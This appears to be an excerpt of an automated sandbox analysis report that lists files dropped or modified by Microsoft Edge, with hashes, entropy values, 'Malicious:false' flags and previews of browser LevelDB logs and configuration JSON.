                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12:TLs9pRSJDBJuqJSEDNvrWjJQ9Dl9np59yDLgHFUxOUDaaTXubHa7mWCMAlviZ7dV:TLapR+DDNzWjJ0npnyXKUO8+j/pRmL
                                                                                                                                                                                                                                                                                                    MD5:D3C446B6A55C02BF21090EA207EAA160
                                                                                                                                                                                                                                                                                                    SHA1:B2CF653091A1367D8234140F2FA04038F909396F
                                                                                                                                                                                                                                                                                                    SHA-256:2D0E9AD0754DAD2B69CBB92AF9899978A1BE4063D88F787F33E559CB0BBB2D5E
                                                                                                                                                                                                                                                                                                    SHA-512:3FD3D59BDF051F2F0EE8C9808673A07B319B3139E2175DCBE3BEBD24BD202C3A6758E633D825E591621D15738DAEFCE6C24C508474101D196A65AECB69CDE1DB
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):375520
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.354103033518202
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:6144:5A/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:5FdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                                    MD5:238F99E5E49CA1C56D33CDD85F7F6352
                                                                                                                                                                                                                                                                                                    SHA1:356F4DFD1EA3F25BC224BFABDF64E91A7D13BCDA
                                                                                                                                                                                                                                                                                                    SHA-256:C69A57DDD7ED39B9F33B57E315E6F34C882FA6A686ABB0DDE55C6B39873B4219
                                                                                                                                                                                                                                                                                                    SHA-512:E87D5004312B0BA2418B76798DD1880E9E49539067A579D5D30DE52BC45DE4B1C688F5F6CB73EB3A513585A5F0CC6C1FD48841B54AA49D38A47BB73695471269
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:...m.................DB_VERSION.1l.1.q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13377747742034996..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):315
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.140133998113046
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:6:iXDtJHuM1N723oH+Tcwtk2WwnvB2KLlkXIuGHIq2PN723oH+Tcwtk2WwnvIFUv:0asaYebkxwnvFLcZGHIvVaYebkxwnQF2
                                                                                                                                                                                                                                                                                                    MD5:915EDCC01944893330280730CCAF94A2
                                                                                                                                                                                                                                                                                                    SHA1:534B764800B0130E1C53AA0594ED408AD0D1BE3E
                                                                                                                                                                                                                                                                                                    SHA-256:BE5E4B5FDA61D1E097363C876F2D37DD62F05D146CB8C50A0B5A21DA17481B85
                                                                                                                                                                                                                                                                                                    SHA-512:1A52303BABC63103FC2F07DFB6CEF0532825A59A39C6856874BB8EB2DD357CA16BCBB8CA05EBDBD48DABCF04425DE2BA2EA8F081C1815DFF70DEB586A10FAF26
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:2024/12/03-20:02:17.699 1c64 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/03-20:02:17.724 1c64 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):41
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                    MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                    SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                    SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                    SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                                    Size (bytes):358860
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.3246143421971
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6R4:C1gAg1zfvw
                                                                                                                                                                                                                                                                                                    MD5:7F2C2588DD1EA7719C32AD22D07312B2
                                                                                                                                                                                                                                                                                                    SHA1:85C5929E9EC7879B96C8DB3C7392BAB8275EAF2F
                                                                                                                                                                                                                                                                                                    SHA-256:08ABFFD644524105BD33869ED7AD4CF52AEB8D9CEFE9C8E2CD614F0F28477E01
                                                                                                                                                                                                                                                                                                    SHA-512:46B38FB6D6AD34D4E1AA2C3D2AD89527B4F142EF4FA77F83E5848385C07093E5C44B694D3C81E4740F4FCF195578D504E957F1DF286834D7D094864834D49A2F
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):418
                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                    MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                    SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                    SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                    SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):325
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.110829906197279
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:6:iXTSKAQL+q2PN723oH+Tcwt8aPrqIFUt8vXThG1Zmw+vXThQLVkwON723oH+TcwC:0TUQyvVaYebL3FUt8PThg/+PThQR5OaE
                                                                                                                                                                                                                                                                                                    MD5:42EA39945B2C7126348D7D2B1C3ED218
                                                                                                                                                                                                                                                                                                    SHA1:712EA97BFCBF9905E99AA2475B8E295E809D6E40
                                                                                                                                                                                                                                                                                                    SHA-256:C6549EDCB29AC65D103C32F3235F28C756B73285CCFA13CD1C0EB159F2F1C771
                                                                                                                                                                                                                                                                                                    SHA-512:0AEC156FDFC935D345B68B98CBBB1AE70CE5B25FCB84769EE6BEA23D1B4322456241C24E65F7B8AEC7AF92F4E0DFA4EB40C4F95EAF590A3C917205487E0F1AD7
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:2024/12/03-20:02:11.517 418 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/03-20:02:11.518 418 Recovering log #3.2024/12/03-20:02:11.518 418 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):325
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.110829906197279
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:6:iXTSKAQL+q2PN723oH+Tcwt8aPrqIFUt8vXThG1Zmw+vXThQLVkwON723oH+TcwC:0TUQyvVaYebL3FUt8PThg/+PThQR5OaE
                                                                                                                                                                                                                                                                                                    MD5:42EA39945B2C7126348D7D2B1C3ED218
                                                                                                                                                                                                                                                                                                    SHA1:712EA97BFCBF9905E99AA2475B8E295E809D6E40
                                                                                                                                                                                                                                                                                                    SHA-256:C6549EDCB29AC65D103C32F3235F28C756B73285CCFA13CD1C0EB159F2F1C771
                                                                                                                                                                                                                                                                                                    SHA-512:0AEC156FDFC935D345B68B98CBBB1AE70CE5B25FCB84769EE6BEA23D1B4322456241C24E65F7B8AEC7AF92F4E0DFA4EB40C4F95EAF590A3C917205487E0F1AD7
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:2024/12/03-20:02:11.517 418 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/03-20:02:11.518 418 Recovering log #3.2024/12/03-20:02:11.518 418 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):418
                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                    MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                    SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                    SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                    SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):329
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.099274553148768
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:6:iXuwQL+q2PN723oH+Tcwt865IFUt8vXLSG1Zmw+vXLSQLVkwON723oH+Tcwt86+e:0NQyvVaYeb/WFUt8PLSg/+PLSQR5OaY4
                                                                                                                                                                                                                                                                                                    MD5:438DA9356B9B8E4511E1CC6189394409
                                                                                                                                                                                                                                                                                                    SHA1:C6F208CB372BEE5FBC8FAD16876EFC557E9D671D
                                                                                                                                                                                                                                                                                                    SHA-256:8F4D4CB6568A2E02BF03D8B2B6640E89B144D17A8B553E085CC871F8A4818C99
                                                                                                                                                                                                                                                                                                    SHA-512:D82DE4C74D3C7693708B6F36B7463E0F07E44DC9E6CCB4D36FEC900084598F5481DA0BB16FCF722D13AD1755A8A02D051C750155463E10ABFF672C4B942E5891
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:2024/12/03-20:02:11.521 418 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/03-20:02:11.524 418 Recovering log #3.2024/12/03-20:02:11.524 418 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):329
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.099274553148768
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:6:iXuwQL+q2PN723oH+Tcwt865IFUt8vXLSG1Zmw+vXLSQLVkwON723oH+Tcwt86+e:0NQyvVaYeb/WFUt8PLSg/+PLSQR5OaY4
                                                                                                                                                                                                                                                                                                    MD5:438DA9356B9B8E4511E1CC6189394409
                                                                                                                                                                                                                                                                                                    SHA1:C6F208CB372BEE5FBC8FAD16876EFC557E9D671D
                                                                                                                                                                                                                                                                                                    SHA-256:8F4D4CB6568A2E02BF03D8B2B6640E89B144D17A8B553E085CC871F8A4818C99
                                                                                                                                                                                                                                                                                                    SHA-512:D82DE4C74D3C7693708B6F36B7463E0F07E44DC9E6CCB4D36FEC900084598F5481DA0BB16FCF722D13AD1755A8A02D051C750155463E10ABFF672C4B942E5891
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:2024/12/03-20:02:11.521 418 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/03-20:02:11.524 418 Recovering log #3.2024/12/03-20:02:11.524 418 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1254
                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                                    MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                                    SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                                    SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                                    SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):325
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.064333406859131
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:6:iXDF4Q+q2PN723oH+Tcwt8NIFUt8vXNFfQgZmw+vXNFfQQVkwON723oH+Tcwt8+Q:0D6VvVaYebpFUt8PX4g/+PX4I5OaYeb2
                                                                                                                                                                                                                                                                                                    MD5:E881BBFB98CC8B312B9D1556A98EAE28
                                                                                                                                                                                                                                                                                                    SHA1:C5E1310C73A9233E8EE6CB3F9ED2F91D13BDFBC2
                                                                                                                                                                                                                                                                                                    SHA-256:085E1336D192C0C2206BE6EA3E44FCC13C319D817704AF55275C92C2E660FE9E
                                                                                                                                                                                                                                                                                                    SHA-512:0637AE3580B0D4527A301E376F991650B5FBC1779715ABE54F48C7B933F6AA8427484495BC32E228A347053162A97B9CB1573F3F9E4622D6AB77843139C21DE5
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:2024/12/03-20:02:12.326 888 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/03-20:02:12.328 888 Recovering log #3.2024/12/03-20:02:12.328 888 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):325
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.064333406859131
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:6:iXDF4Q+q2PN723oH+Tcwt8NIFUt8vXNFfQgZmw+vXNFfQQVkwON723oH+Tcwt8+Q:0D6VvVaYebpFUt8PX4g/+PX4I5OaYeb2
                                                                                                                                                                                                                                                                                                    MD5:E881BBFB98CC8B312B9D1556A98EAE28
                                                                                                                                                                                                                                                                                                    SHA1:C5E1310C73A9233E8EE6CB3F9ED2F91D13BDFBC2
                                                                                                                                                                                                                                                                                                    SHA-256:085E1336D192C0C2206BE6EA3E44FCC13C319D817704AF55275C92C2E660FE9E
                                                                                                                                                                                                                                                                                                    SHA-512:0637AE3580B0D4527A301E376F991650B5FBC1779715ABE54F48C7B933F6AA8427484495BC32E228A347053162A97B9CB1573F3F9E4622D6AB77843139C21DE5
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:2024/12/03-20:02:12.326 888 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/03-20:02:12.328 888 Recovering log #3.2024/12/03-20:02:12.328 888 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):429
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                                    MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                                    SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                                    SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                                    SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):115717
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                    MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                    SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                    SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                    SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
